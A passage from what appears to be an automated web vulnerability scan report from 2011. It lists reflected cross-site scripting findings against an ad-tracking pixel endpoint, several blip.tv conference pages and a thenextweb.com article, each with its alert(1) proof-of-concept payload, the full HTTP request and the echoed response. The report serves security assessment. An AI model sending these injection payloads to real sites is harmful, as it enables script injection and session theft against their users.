Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41148"-alert(1)-"97cd6e245a9 was submitted in the campId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jspix?anId=134&advId=2356384&campId=539639741148"-alert(1)-"97cd6e245a9&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=134E3C18FDC2B7E1829554984D119392; Path=/
Connection: keep-alive
Content-Length: 8641


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
83032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=539639741148"-alert(1)-"97cd6e245a9&chanId=239414132&placementId=62214207&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=funct
...[SNIP]...

3.79. http://pixel.adsafeprotected.com/jspix [chanId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the chanId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d9e"-alert(1)-"bdc978586f7 was submitted in the chanId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132b7d9e"-alert(1)-"bdc978586f7&placementId=62214207&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FD1080344A4046555CB1ACB98C897FBC; Path=/
Connection: keep-alive
Content-Length: 8641


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5396397&chanId=239414132b7d9e"-alert(1)-"bdc978586f7&placementId=62214207&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typ
...[SNIP]...

3.80. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89bc6"-alert(1)-"70137643fe4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126&89bc6"-alert(1)-"70137643fe4=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=21B1BE1ED3A87016416FACEF53861DE9; Path=/
Connection: keep-alive
Content-Length: 8644


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
rd=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126&89bc6"-alert(1)-"70137643fe4=1",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=A.INFO;}if
...[SNIP]...

3.81. http://pixel.adsafeprotected.com/jspix [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the placementId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13e10"-alert(1)-"ffa02563ec8 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=6221420713e10"-alert(1)-"ffa02563ec8&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C985B7FA5991596DFB034D9DA273D364; Path=/
Connection: keep-alive
Content-Length: 8641


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
s_cpc_apr_728;ord=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=6221420713e10"-alert(1)-"ffa02563ec8&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){
...[SNIP]...

3.82. http://pixel.adsafeprotected.com/jspix [pubId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71116"-alert(1)-"f92110ae5 was submitted in the pubId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=103612671116"-alert(1)-"f92110ae5 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8E2733FC94ED1B7A52E98C8CA0FAC74F; Path=/
Connection: keep-alive
Content-Length: 8639


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
ord=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=103612671116"-alert(1)-"f92110ae5",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=A.INFO;}if(p
...[SNIP]...

3.83. http://sourcebarcelona2010.blip.tv/posts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourcebarcelona2010.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65992"><script>alert(1)</script>7d42614a729 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?65992"><script>alert(1)</script>7d42614a729=1 HTTP/1.1
Host: sourcebarcelona2010.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:15 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 54475
Date: Tue, 19 Apr 2011 19:48:15 GMT
X-Varnish: 1342697601
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="/?sort=custom;date=;user=sourcebarcelona2010;s=posts;65992"><script>alert(1)</script>7d42614a729=1;page=2">
...[SNIP]...

3.84. http://sourcebarcelona2010.blip.tv/posts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourcebarcelona2010.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5f1e'%3balert(1)//c148b0a504b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5f1e';alert(1)//c148b0a504b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?a5f1e'%3balert(1)//c148b0a504b=1 HTTP/1.1
Host: sourcebarcelona2010.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-otter-skin: blipnew
Vary: Cookie
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:17 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 54394
Date: Tue, 19 Apr 2011 19:48:18 GMT
X-Varnish: 1716121387
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<script type="text/javascript">
   
       
                       window.rss_feed_url = 'http://sourcebarcelona2010.blip.tv/rss?sort=custom;page=1;date=;a5f1e';alert(1)//c148b0a504b=1;user=sourcebarcelona2010;s=posts';
           window.generic_feed_uri = 'sort=custom;page=1;date=;a5f1e\';alert(1)//c148b0a504b=1;user=sourcebarcelona2010;s=posts';
           
       
   </script>
...[SNIP]...

3.85. http://sourceboston2008.blip.tv/posts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceboston2008.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a96b9'%3balert(1)//ac16476f5de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a96b9';alert(1)//ac16476f5de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?a96b9'%3balert(1)//ac16476f5de=1 HTTP/1.1
Host: sourceboston2008.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:51 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 53340
Date: Tue, 19 Apr 2011 19:47:52 GMT
X-Varnish: 723153243
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<script type="text/javascript">
   
       
                       window.rss_feed_url = 'http://sourceboston2008.blip.tv/rss?a96b9';alert(1)//ac16476f5de=1;sort=date;page=1;date=;user=sourceboston2008;s=posts';
           window.generic_feed_uri = 'a96b9\';alert(1)//ac16476f5de=1;sort=date;page=1;date=;user=sourceboston2008;s=posts';
           
       
   </script>
...[SNIP]...

3.86. http://sourceboston2008.blip.tv/posts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceboston2008.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf6a5"><script>alert(1)</script>1e232d81774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?bf6a5"><script>alert(1)</script>1e232d81774=1 HTTP/1.1
Host: sourceboston2008.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-otter-skin: blipnew
Vary: Cookie
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:50 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 53436
Date: Tue, 19 Apr 2011 19:47:50 GMT
X-Varnish: 941599355
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="/?sort=date;date=;bf6a5"><script>alert(1)</script>1e232d81774=1;user=sourceboston2008;s=posts;page=2">
...[SNIP]...

3.87. http://sourceboston2009.blip.tv/posts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceboston2009.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22f00'%3balert(1)//ce990a6fdd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 22f00';alert(1)//ce990a6fdd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?22f00'%3balert(1)//ce990a6fdd2=1 HTTP/1.1
Host: sourceboston2009.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:18 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 54897
Date: Tue, 19 Apr 2011 19:48:18 GMT
X-Varnish: 1427563464
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<script type="text/javascript">
   
       
                       window.rss_feed_url = 'http://sourceboston2009.blip.tv/rss?sort=date;page=1;date=;user=sourceboston2009;s=posts;22f00';alert(1)//ce990a6fdd2=1';
           window.generic_feed_uri = 'sort=date;page=1;date=;user=sourceboston2009;s=posts;22f00\';alert(1)//ce990a6fdd2=1';
           
       
   </script>
...[SNIP]...

3.88. http://sourceboston2009.blip.tv/posts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceboston2009.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 282e3"><script>alert(1)</script>0b14ceaf125 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?282e3"><script>alert(1)</script>0b14ceaf125=1 HTTP/1.1
Host: sourceboston2009.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-otter-skin: blipnew
Vary: Cookie
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:17 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 55008
Date: Tue, 19 Apr 2011 19:48:17 GMT
X-Varnish: 1716121237
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="/?sort=date;282e3"><script>alert(1)</script>0b14ceaf125=1;date=;user=sourceboston2009;s=posts;page=2">
...[SNIP]...

3.89. http://sourceboston2010.blip.tv/posts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceboston2010.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ca2b"><script>alert(1)</script>973845e00e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?3ca2b"><script>alert(1)</script>973845e00e3=1 HTTP/1.1
Host: sourceboston2010.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:48 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:48 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 54010
Date: Tue, 19 Apr 2011 19:47:48 GMT
X-Varnish: 941599049
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="/?3ca2b"><script>alert(1)</script>973845e00e3=1;sort=custom;date=;user=sourceboston2010;s=posts;page=2">
...[SNIP]...

3.90. http://sourceboston2010.blip.tv/posts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceboston2010.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eccf8'%3balert(1)//75f0ef58d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eccf8';alert(1)//75f0ef58d87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?eccf8'%3balert(1)//75f0ef58d87=1 HTTP/1.1
Host: sourceboston2010.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:49 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:49 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 53899
Date: Tue, 19 Apr 2011 19:47:49 GMT
X-Varnish: 441991143
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<script type="text/javascript">
   
       
                       window.rss_feed_url = 'http://sourceboston2010.blip.tv/rss?sort=custom;page=1;date=;eccf8';alert(1)//75f0ef58d87=1;user=sourceboston2010;s=posts';
           window.generic_feed_uri = 'sort=custom;page=1;date=;eccf8\';alert(1)//75f0ef58d87=1;user=sourceboston2010;s=posts';
           
       
   </script>
...[SNIP]...

3.91. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [awesm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thenextweb.com
Path:   /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/

Issue detail

The value of the awesm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82105</script><script>alert(1)</script>ebaf4f8c75 was submitted in the awesm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX82105</script><script>alert(1)</script>ebaf4f8c75&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 172.20.0.144
Set-Cookie: PHPSESSID=c58okdiednff7kv9uev8soqi94; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ocmx_mobile=deleted; expires=Mon, 19-Apr-2010 19:48:25 GMT; path=/
Set-Cookie: ocmx_mobile=normal; path=/
X-Pingback: http://thenextweb.com/industry/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 19-Apr-2010 19:48:25 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 19-Apr-2010 19:48:25 GMT; path=/
Link: <http://thenextweb.com/industry/?p=4378>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 82244
Date: Tue, 19 Apr 2011 19:51:47 GMT
Age: 0
Connection: close
X-Cache: MISS

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title> Beyond analytics, VigLink automates affiliate links to pay p
...[SNIP]...
eme_url': 'http://thenextweb.com/industry/wp-content/themes/tnw_4',
'current_url': '/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX82105</script><script>alert(1)</script>ebaf4f8c75&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to'
};
</script>
...[SNIP]...

3.92. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thenextweb.com
Path:   /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d8bd</script><script>alert(1)</script>73986555b6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?5d8bd</script><script>alert(1)</script>73986555b6d=1 HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 172.20.0.144
